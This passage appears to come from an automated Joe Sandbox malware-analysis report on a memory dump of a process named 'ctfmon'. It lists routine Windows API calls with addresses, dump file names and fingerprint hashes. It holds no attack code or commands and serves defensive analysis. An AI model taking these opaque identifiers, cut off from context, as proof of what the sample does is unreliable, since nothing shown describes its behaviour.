        • GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiStringTypeWide
        • String ID: qhA
        • API String ID: 3139900361-109923292
        • Opcode ID: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
        • Instruction ID: 89e0a92cda9d94ff151431ccce99fae9d9c15686a517ecb08ba51b8be8b920dd
        • Opcode Fuzzy Hash: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
        • Instruction Fuzzy Hash: ABF0FE32A01559EFCF218FD0ED859EEBF72FB04364F114625FA11611A0C7358961DB95
        APIs
        • GetClassNameA.USER32(?,?,00000010), ref: 0041DC8E
        • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041DC9E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClassNamelstrcmp
        • String ID: ComboBox
        • API String ID: 3770760073-1152790111
        • Opcode ID: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
        • Instruction ID: 49f8500e78018a632b0791ce0c797fe6f4d891fdbedeabdab1c9b0ad4b943904
        • Opcode Fuzzy Hash: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
        • Instruction Fuzzy Hash: D9E0DFB0B002006BD724AB248C49AAA32E8F754701FD40D5CF108C11A1FBBAD589CB9A
        APIs
        • EnterCriticalSection.KERNEL32(?), ref: 00428B70
        • LeaveCriticalSection.KERNEL32(?,?), ref: 00428B80
        • LocalFree.KERNEL32(?), ref: 00428B89
        • TlsSetValue.KERNEL32(?,00000000), ref: 00428B9F
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$EnterFreeLeaveLocalValue
        • String ID:
        • API String ID: 2949335588-0
        • Opcode ID: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
        • Instruction ID: 44b9a5697ca3fe7116b24a0973f7addb02f1af333081b1e9ede574ef100a776b
        • Opcode Fuzzy Hash: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
        • Instruction Fuzzy Hash: 13218931302220EFD7208F45E885B6E7BA4FF45712F50806EF5029B2A2CBB5F842CB58
        APIs
        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413411
        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413445
        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0041345F
        • HeapFree.KERNEL32(00000000,?), ref: 00413476
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocHeap$FreeVirtual
        • String ID:
        • API String ID: 3499195154-0
        • Opcode ID: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
        • Instruction ID: c5f407516b639af01f7cf3b5c3ec23f839086e4030b11980835d7e942e3d2777
        • Opcode Fuzzy Hash: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
        • Instruction Fuzzy Hash: 65118230600601DFD7318F69EC499567BB5FFA57157604A2AF1A1CA2B0C771A88EDF44
        APIs
        • EnterCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F74
        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F86
        • LeaveCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F8F
        • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5), ref: 00428FA1
          • Part of subcall function 00428EA6: GetVersion.KERNEL32(?,00428F49,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5,0042601F), ref: 00428EB9
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$Enter$InitializeLeaveVersion
        • String ID:
        • API String ID: 1193629340-0
        • Opcode ID: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
        • Instruction ID: 78c625607d6fa9dd441586049681e252a915402f59230de00c6089102d7b9ab4
        • Opcode Fuzzy Hash: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
        • Instruction Fuzzy Hash: 67F04471A0121ADFC7209F54FCC499AB76DFB24356B81043BE605D3221DB35A459DFA8
        APIs
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412561
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412569
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412571
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412579
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalInitializeSection
        • String ID:
        • API String ID: 32694325-0
        • Opcode ID: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
        • Instruction ID: c31dbd3ccd9fd40a20c5e7c4c7202aa3fbdad9c40b9ff82e0d969961f7efeac2
        • Opcode Fuzzy Hash: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
        • Instruction Fuzzy Hash: A4C04031901074DBCF533B65FD4784D3FA6EF052603012273E144514308AB11D21DFC8